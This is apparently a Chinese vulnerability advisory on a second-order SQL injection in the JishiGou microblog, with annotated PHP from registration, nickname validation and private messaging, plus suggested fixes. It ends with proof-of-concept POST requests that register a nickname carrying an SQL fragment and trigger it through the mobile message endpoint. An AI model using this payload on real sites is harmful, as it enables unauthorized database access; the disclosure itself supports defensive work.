记事狗微博二次注射漏洞
2014-2-21 13:39:18  
 

漏洞作者: Chora

提交时间: 2013-11-19 22:57
公开时间: 2014-02-17 22:57

漏洞类型: SQL注射漏洞
modules/member.mod.php

/**
 * Registration form handler (index.php?mod=member&code=doregister).
 *
 * Steps visible in this excerpt: optional CAPTCHA check, invitation handling,
 * password length/confirmation checks, the 'reg' plugin hook, then
 * jsg_member_register($nickname, $password, $email). The nickname is the raw
 * $this->Post['nickname']; nothing in this function escapes or validates it —
 * that is left to checkname() inside register(). Lines marked "......" are
 * elided in this excerpt; $regstatus is assigned in one of the elided parts.
 */
function DoRegister()

{

......

/**

* CAPTCHA check

* Performed only when registration CAPTCHA checking is enabled.

*/

// All five conditions are joined with && (not ||): the CAPTCHA is verified only
// when every one of these settings is on. With any of them off, registration
// through this page needs no CAPTCHA at all, which leaves it open to scripted
// (automated) registration.
if ($this->Config['seccode_enable']>1 && $this->Config['seccode_register'] && $this->yxm_title && $this->Config['seccode_pub_key'] && $this->Config['seccode_pri_key']) {

// '@' silences undefined-index notices on the raw $_POST fields.
$YinXiangMa_response=jlogic('seccode')->CheckYXM(@$_POST['add_YinXiangMa_challenge'],@$_POST['add_YXM_level'][0],@$_POST['add_YXM_input_result']);

// The result is compared loosely (!=) against the string "true".
if($YinXiangMa_response != "true"){

$this->Messager("验证码输入错误",-1);

}

}

/* Invitation handling */

$inviter_member = array();

// POST wins over GET; a falsy POST value ('', '0') falls through to GET.
$invite_code = ($this->Post['invite_code'] ? $this->Post['invite_code'] : $this->Get['invite_code']);

$check_result = jsg_member_register_check_invite($invite_code);

// Invite-only mode: $regstatus is set in an elided part of this function.
if($regstatus['invite_enable'] && !$regstatus['normal_enable'])

{

if(!$invite_code)

{

$this->Messager("本站目前需要有好友邀请链接才能注册。<br><br>看看<a href=\"?mod=topic&code=top\">达人榜</a>中有没有你认识的人,让他给你发一个好友邀请。", null);

}

if(!$check_result)

{

$this->Messager("对不起,您访问的邀请链接不正确或者因邀请数已满而失效,请重新与邀请人索取链接。", null);

}

}

// A valid invitation resolves to the inviting member.
if($check_result['uid'] > 0)

{

$inviter_member = jsg_member_info($check_result['uid']);

}

// Fallback: inviter typed by nickname, when the site allows it.
if(!$inviter_member && $this->Config['register_invite_input'])

{

$inviter_member = jsg_member_info($this->Post['inviter_nickname'], 'nickname');

}

/* Read input */

$password = $this->Post['password'];

$email = $this->Post['email'];

// Username and nickname are the same raw POST value at this point.
$username = $nickname = $this->Post['nickname'];

/* Password checks */

// strlen() counts bytes, not characters.
if(strlen($password) < 5) {

$this->Messager("密码过短,请设置至少5位",-1);

}

// Loose comparison (!=): numeric-looking strings are compared as numbers.
if($password != $this->Post['password2']) {

$this->Messager("两次输入的密码不相同",-1);

}

// Plugin hook for the 'check' step of registration, if a plugin registered one.
if($GLOBALS['_J']['plugins']['func']['reg']) {

hookscript('reg', 'funcs', array('param' => $this->Post, 'step' => 'check'), 'reg');

}

/* Perform registration */

// Follow into 0x01: register() in include/class/passport.class.php. The nickname
// is passed on unescaped; the only validation it gets is checkname() there.
$uid = jsg_member_register($nickname, $password, $email);

......

}

include/class/passport.class.php

/**
 * Creates a member row (0x01).
 *
 * Visible steps: trim + strip_tags on the nickname, checkname() validation
 * (any result below 1 is returned to the caller as an error code), then a
 * $sql_datas array is assembled and written with a string-built INSERT.
 * The closing brace of the `if($jsg_result < 1)` block, the assignment of
 * $ip, and other parts are elided ("......") in this excerpt. The $role_id
 * parameter is not used in the visible lines; role_id is taken from config.
 */
function register($nickname, $password, $email, $username = '', $ucuid = 0, $role_id = 0) {

......

// strip_tags() removes HTML tags only; SQL-meaningful characters such as
// quotes, parentheses and '=' survive.
$nickname = trim(strip_tags($nickname));

// Follow into checkname() below: the only validation the nickname receives.
$jsg_result = $this->checkname($nickname, 1, $ucuid);

// Error codes (< 1) are passed straight back to the caller.
if($jsg_result < 1) {

return $jsg_result;

......

$timestamp = time();

$sql_datas = array();

$sql_datas['ucuid'] = $ucuid;

$sql_datas['salt'] = jsg_member_salt();

$sql_datas['password'] = jsg_member_password($password, $sql_datas['salt']);

// Stored as validated by checkname() — no escaping applied here.
$sql_datas['nickname'] = $nickname;

$sql_datas['username'] = ($username ? $username : '');

// Not validated in the visible lines (elided parts may do so).
$sql_datas['email'] = $email;

$sql_datas['role_type'] = 'normal';

// Unverified-email role when email verification is on, otherwise the default role.
$sql_datas['role_id'] = (int) ($GLOBALS['_J']['config']['reg_email_verify'] ? $GLOBALS['_J']['config']['no_verify_email_role_id'] : $GLOBALS['_J']['config']['normal_default_role_id']);

// random() is a project helper; its strength is not visible in this excerpt.
$sql_datas['invitecode']= substr(md5(random(32)),-16);

$sql_datas['regdate'] = $sql_datas['lastactivity'] = $timestamp;

// $ip is assigned in an elided part of this function.
$sql_datas['regip'] = $sql_datas['lastip'] = $ip;

// Optional extended credit columns, seeded with their configured defaults.
if ($GLOBALS['_J']['config']['extcredits_enable'])

{

$credits = ConfigHandler::get('credits');

foreach ($credits['ext'] as $_k=>$_v)

{

if ($_v['enable'] && $_v['default'])

{

$sql_datas[$_k] = (int) $_v['default'];

}

}

}

// Stored here. Column names and values are concatenated into the SQL text:
// implode() wraps each value in single quotes but nothing in this excerpt
// escapes them. Unless DB::query() escapes internally (not visible here), a
// quote inside the nickname is written to the row unmodified and is later
// read back and reused by pmSend(). Escaping every value (or a prepared
// statement) at this point is the fix for the storage side.
DB::query("insert into `" . TABLE_PREFIX . "members` (`" . implode("`,`", array_keys($sql_datas)) . "`) values ('".implode("','",$sql_datas)."')");

......

}

/**
 * Validates a username ($is_nickname == 0) or nickname ($is_nickname != 0).
 *
 * Returns -1 when the value is rejected. Length is measured with jstrlen()
 * (project helper); the cap is 50 for nicknames when UCENTER is not exactly
 * true, otherwise 15, and the nickname_length config can only lower it.
 * The character checks are skipped when $ucuid >= 1 (presumably accounts
 * coming from UCenter — confirm). Whatever follows the visible checks
 * (likely the $check_exists path) is elided ("......") in this excerpt.
 */
function checkname($username, $is_nickname = 0, $ucuid = 0, $check_exists = -1) {

$username = trim(strip_tags($username));

$username_len = jstrlen($username);

// The 50-character nickname cap does not by itself prevent abuse: the
// advisory notes that a short SQL fragment fits within it (an echo-based
// rather than blind injection keeps the payload short).
$ulmax = ($is_nickname && true !== UCENTER ? 50 : 15);

$nickname_length = (int) $GLOBALS['_J']['config']['nickname_length'];

// For nicknames the configured length lowers the cap but never raises it
// above $ulmax; 0/unset leaves $ulmax unchanged.
$is_nickname && $ulmax = !$nickname_length ? $ulmax : ($nickname_length >$ulmax ? $ulmax : $nickname_length);

if($username_len < 3 || $username_len > $ulmax)

{

return -1;

}

if($ucuid < 1)

{

// Purely numeric names are rejected (e.g. so they cannot look like uids).
if(is_numeric($username)) {

return -1;

}

if($is_nickname)

{

// Blacklist: rejects < > ? @ $ # [ ] { } and whitespace, but lets quotes,
// parentheses, '=', '/' and '*' through, and a SQL comment (/**/) serves as
// a whitespace substitute — so the check does not stop a SQL fragment. Also,
// preg_match() returns false on a PCRE error and `false != false` is false,
// so a regex failure would let the value through. An allowlist like the
// username branch below is the robust fix.
if(false != preg_match('~[\<\>\?\@\$\#\[\]\{\}\s]+~',$username))

{

return -1;

}

}

else

{

// Allowlist: only word characters (\w already covers \d and _, so those are
// redundant). Without the u modifier this matches byte-wise.
if((false == preg_match('~^[\w\d\_]+$~',$username)))

{

return -1;

}

}

}

......

}

modules/ajax/pm.mod.php

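/**
 * Mobile AJAX endpoint (mobile/ajax.php?mod=pm&code=send): sends a private
 * message to the member whose uid was posted.
 *
 * Reads $this->Post['uid'] and $this->Post['message'], resolves the uid to the
 * stored nickname and hands {to_user, message} to MyPmLogic->pmSend(). Replies
 * through Mobile::success()/Mobile::error(); the trailing "Unkonw error"
 * response is reached only when no known result code matched.
 *
 * Fix: the last branch of the original compared the bare identifier `ret`
 * (missing `$`) with 3, so result code 3 was never matched (and on PHP 8 the
 * undefined constant is a fatal Error); it now tests `$ret`.
 */
function send()
{
    // The uid is cast to int before being placed in the query, so this lookup
    // is not injectable by itself.
    $uid = intval($this->Post['uid']);
    $member = DB::fetch_first("SELECT nickname FROM ".DB::table("members")." WHERE uid='{$uid}'");
    if (empty($member)) {
        Mobile::error("No User", 300);
    }

    // The nickname is read back exactly as it was stored at registration.
    // checkname() only blacklists a handful of characters, so a quote can
    // survive into this value; pmSend() then builds a SQL IN-list from it
    // (second-order injection). The sink must escape or parameterize it —
    // a value is not trusted merely because it came from the database.
    $to_user = $member['nickname'];

    $data = array(
        'to_user' => $to_user,
        'message' => trim($this->Post['message']),
    );

    // See pmSend() in include/logic/pm.logic.php (0x02) for the result codes.
    // It can also return a filter message string; with the loose `== 0` below
    // a non-numeric string compares equal to 0 on PHP 7 and earlier, so such a
    // rejection would be reported as "Success" — kept as in the original and
    // flagged here for follow-up.
    $ret = $this->MyPmLogic->pmSend($data);
    if ($ret == 0) {
        Mobile::success("Success");
    } elseif ($ret == 1) {
        Mobile::error("Content not emtpy", 420);
    } elseif ($ret == 2) {
        Mobile::error("Content not emtpy", 321);
    } elseif ($ret == 3) {
        Mobile::error("Content not emtpy", 321);
    }
    Mobile::error("Unkonw error", 250);
}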

include/logic/pm.logic.php 0x02

/**
 * Sends a private message on behalf of the current member (0x02).
 *
 * Sender defaults come from the MEMBER_ID / MEMBER_NAME / MEMBER_NICKNAME
 * constants. Result codes visible in this excerpt: 6 (no 'pm'/'send'
 * permission), the content filter's message string when it flags an error,
 * 1 (empty message), 2 (neither buddy_list nor to_user given). The recipient
 * lookup builds a `nickname IN (...)` query from $post['to_user'].
 * The function continues past this excerpt ("......" inside the while loop
 * and everything after it is elided).
 */
function pmSend($post,$suid=MEMBER_ID,$susername=MEMBER_NAME,$snickname=MEMBER_NICKNAME){

if(jaccess('pm','send', $suid)==false) {

return 6;

}

$to_user_list=array();

// The content filter is applied to the message body only; 'to_user' is not
// filtered or validated anywhere in this function.
$f_rets = filter($post['message']);

if($f_rets)

{

if($f_rets['error'])

{

// Returns the filter's message rather than a numeric code.
return $f_rets['msg'];

}

}

// send() in modules/ajax/pm.mod.php passes no 'subject', so this reads an
// undefined key on that path.
$post['subject']=jhtmlspecialchars(trim($post['subject']));

if($post['message']=='')

{

return 1;

}

// Loose comparison: '', '0', 0, null and [] all == false.
if ($post['buddy_list']==false && $post['to_user']=="")

{

return 2;

}

if(trim($post['to_user'])!='')

{

// BuildIn() turns the nickname string into the IN-list predicate. Whether it
// escapes the values is not visible here; the advisory reports that a quote
// inside the stored nickname reaches the query below.
$in=$this->DatabaseHandler->BuildIn($post['to_user'],"nickname");

$sql="

SELECT

`uid`,`username`,`nickname`,`notice_pm`,`email`,`email_checked`,`newpm`,`at_new`,`event_new`,`fans_new`,`vote_new`,`qun_new`,`dig_new`,`channel_new`,`comment_new`,`user_notice_time`,`lastactivity`

FROM

".TABLE_PREFIX.'members'."

WHERE

$in";

// The nickname-derived predicate is interpolated into the WHERE clause here —
// the injection point reported by the advisory. Escaping each nickname (or a
// prepared statement) at this sink fixes it regardless of what checkname()
// allowed at registration.
$query = $this->DatabaseHandler->Query($sql);

while($row=$query->GetRow())

{

......

}

POST

email=www@wooyun.org&password=12345&password2=12345&nickname=woo

http://localhost/jishigou/index.php?mod=member&code=doregister

先注册一个woo用户,用于回显。

然后POST

email=Chora@wooyun.org&password=12345&password2=12345&nickname=woo')and/**/1=1/**/and('1

http://localhost/jishigou/index.php?mod=member&code=doregister

引入注入语句。

然后访问自己的主页,查看自己的UID。

最后POST

uid=你的UID&message=wooyun

http://localhost/jishigou/mobile/ajax.php?mod=pm&code=send

触发注入。